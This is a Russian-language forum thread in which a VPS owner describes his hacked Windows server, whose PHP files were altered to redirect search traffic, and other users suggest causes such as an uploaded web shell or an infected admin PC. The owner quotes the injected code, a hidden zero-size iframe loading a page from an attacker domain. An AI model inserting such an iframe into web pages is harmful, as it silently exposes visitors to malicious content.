Взлом сервера

12 3
V
На сайте с 28.01.2008
Offline
41
3488

здравствуйте. Недавно у меня взломали сервер и внесли изменения почти во все файлы с расширением php (добавили код который переадресует пользователей с поисковых систем на другие сайты) из-за этого много сайтов вылетели из индекса... добавили новые файлы (создали дополнительные странички, внесли изменения в карту сайта) и т.д. Я это все выявил, восстановил из чистого архива движки сайтов. По безопасности сделал следующее: запретил использование почтовых портов, ssh, и вход в админ панель только с одного ip адреса (он у меня статический). Но вот сегодня обнаружил, что опять на сайтах произошли изменения. Согласно журнала был вход под моим ip с 00-43 до 00-50 и изменены файлы в основном index.php внесли фрейм вида "<iframe src="http://mazahack.net/go.ph4lb" width=0 height=0 frameborder=0></iframe>" ...

Хостинг от firstvds.ru, виртуальный выделенный сервер.

Подскажите пожалуйста как такое стало возможным (статический адрес только у меня такой) и как я смогу себя обезопасить. Спасибо.

N
На сайте с 06.05.2007
Offline
419
#1

Почему бы злоумышленникам не изменять файлы подключаясь с вашего компьютера ?

В списке предпринятых действий ничего не написано про то, что было сделано на рабочем компьютере. Антивирус хоть запускали ? В идеале, конечно, переустановка системы нужна.

Кнопка вызова админа ()
M
На сайте с 01.12.2009
Offline
235
#2

Надо детальнее рассматривать, вы могли трактовать не верно логи

Администратор Linux,Freebsd. построения крупных проектов.
R
На сайте с 24.01.2008
Offline
180
#3

Большая вероятность, что вам залили шелл, потомуи не помогает изменения паролей и др. действия.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
Andreyka
На сайте с 19.02.2005
Offline
822
#4

Надо проверить через что именно сломали.

Не стоит плодить сущности без необходимости
V
На сайте с 28.01.2008
Offline
41
#5
Rxp:
Большая вероятность, что вам залили шелл, потомуи не помогает изменения паролей и др. действия.

Как его можно выявить?

PS. Комп проверял установленным нодом пятеркой и дестопным др. вебером - чист

Andreyka
На сайте с 19.02.2005
Offline
822
#6

Сервер под какой ОС? Windows?

V
На сайте с 28.01.2008
Offline
41
#7

да под виндовс

Andreyka
На сайте с 19.02.2005
Offline
822
#8

Тогда ой. А зачем для сайта на php винда?

A
На сайте с 14.11.2011
Offline
34
alw
#9

Бутаться с ливцд и проверять..

Администрирование linux, windows (/ru/forum/671883) icq 4831950
Romka_Kharkov
На сайте с 08.04.2009
Offline
485
#10

После того как система уже скомпрометирована .... даже в unix нет смысла что-то чинить по большому счету, ибо есть всякие kld вирусы и прочее, которые отрезают сами себя от окружения и вы их попросту не видите ни в процессах ни где..... Что уж тут говорить про винду...... А вообще менять ваши файлы на сервере можно и через мелкую дырочку в любом из ваших же PHP cкриптов к примеру, т.е ssh и прочее вообще не нужно ..... человек на сайт к вам зашел и все сделал что надо... изучайте логи веб сервера.... я думаю там вы обязательно что-то найдете :D

Есть около 15.000 ipv4 !!! (http://onyx.net.ua/price.php#ipv4) Качественный хостинг с 2005 года - лучшее клиентам! (http://onyx.net.ua/)
12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий